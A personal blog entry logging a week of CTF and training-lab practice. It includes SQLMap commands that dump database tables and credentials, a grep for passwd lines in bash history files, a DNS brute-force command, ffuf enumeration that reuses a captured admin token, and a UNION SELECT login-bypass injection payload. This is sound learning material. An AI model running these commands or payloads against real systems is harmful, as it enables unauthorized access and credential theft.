Ethical Hacking Diaries #6 – A Story of SQLMap and Tokens

This post is coming a bit late, yet not too late. The past week and even this week was an eventful one. We now have regular streams on Twitch and we are all having a blast solving CTF challenges together. There is a lot to learn from each other and I really like that. I also just introduced an attempt to interconnect those blog articles with some accompanying YouTube videos. You find the video below.

I will now try to do both, still, write those blog posts but connect them with a video. I don’t exactly know how this will turn out yet, but we are about to see 🙂

Below you’ll find a digest of things I have learned in Week #15 of 2020.

Pentesterlabs

I continued a bit with the Pentesterlab’s Unix Badge this past week and have learned a couple of different ways of using Grep.

Let’s say you are searching the .bash_history file for lines that start with the phrase passwd, there is an easy way to do so:

find . -name .bash_history -exec grep -A 1 ^passwd {} \;

By using this, only lines that are starting with passwd will be displayed. Very useful if you want to narrow down your search and filter out unwanted results.

SQLMap

I have played around with SQLMap a bit more and I start liking the tool. I had to use it to extract some Database Tables and Table Entries to solve a CTF ( I think it was VulnLtd on CTFCHallenge.co.uk…)

I’ll show you what I have learned.

Basic SQLMap Scan

sudo sqlmap -u https://www.example.com

Running SQLMap against a specific (POST) form

I like this one. Very useful.

sudo sqlmap -u https://www.example.com/login --data="username=testing&password=testing" --method POST

Extracting Databases with SQLMap

This extracts all Database information SQLMap can find

sudo sqlmap -u https://www.example.com/ --dbs

Extracting Database Tables

Same thing as above but for Tables.

sudo sqlmap -u "url" --tables

Dumping specific Database Table Entries in clear Text

As you can imagine, a great way to extract Usernames and Passwords.
sudo sqlmap -u https://www.example.com/login --data="username=iron&password=man" --method POST -D level2 --columns -T admins --dump

Bypassing a Web Application Firewall

Now I didn’t dive into that yet, but I just want to leave the very worth-while article here that I have found. You can go ahead and read it.

DNSRecon

I have used DNSRecon for the first time while playing a CTF on CTFChallenge.co.uk. Someone in our Twitch Chat recommended it to me, as I haven’t found this particular subdomain by scanning with Subfinder, Amass, and DirSearch.

It shows you once more, it’s always worthy to run multiple tools to get the best of all worlds.

dnsrecon -d vulnbegin.co.uk -D namelist.txt -t brt

This is doing a DNS Enumeration Bruteforce Attack using the defined name list. I was able to retrieve the hidden domain with it. I am going to add this to my Recon script for sure.

X-Token

The more I dive into Bug Bounties and Web in general, the more I start to learn about Cookies, Tokens, etc. This last week I have learned to use an existing token, in this case, a token from an Admin Account, to do further directory enumeration with Ffuf. This is indeed very useful.

ffuf -c -w common.txt -u https://vulnbegin.co.uk/cpadmin/FUZZ -replay-proxy http://127.0.0.1:8080 -r -ac -b "token=2eff535bd75e77b62c70ba1e4dcb2873"
Another lesson learned from CTFChallenge.co.uk. In this case, we utilized the X-Token that we have gathered from logging in as admin to do further directory enumeration on the control panel.

SQLi Admin Bypass

The last thing for week #15 is an Admin Bypass utilizing UNION SELECT in a login form that is vulnerable to SQL Injection.
You have a default login form:
Username:
Password:
You would paste the following Payload into the Username field
admin' UNION SELECT 'foobar' AS password#&password=foobar
As you can see, we use UNION SELECT to set a new Admin password: foobar
So the whole deal would look like this:
Username: admin’ UNION SELECT ‘foobar’ AS password#&password=foobar
Password: foobar
This allows us to log in with the Admin account and bypass its original password. Legit.

Conclusion Week #15

I become more and more of a fanboy of Web-Based CTF’s. There is so much to learn from them. Definitely go and check out ctfchallenge.co.uk. In the accompanying video to this blog post, that will be released shortly, I will go a little more in-depth into the above topics and maybe even show an example or two.

In week #16 I learned a ton. I have such a long list of notes already. Learned a ton doing more Pentesterlabs. You can look forward to it!

Let me know what you think of this new format in the comments below and also make sure to Subscribe to my YouTube Channel, so you’ll see when a new episode of The Ethical Hacking Diaries drops over there 🙂

Ceo out.

Tell us what you think!

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: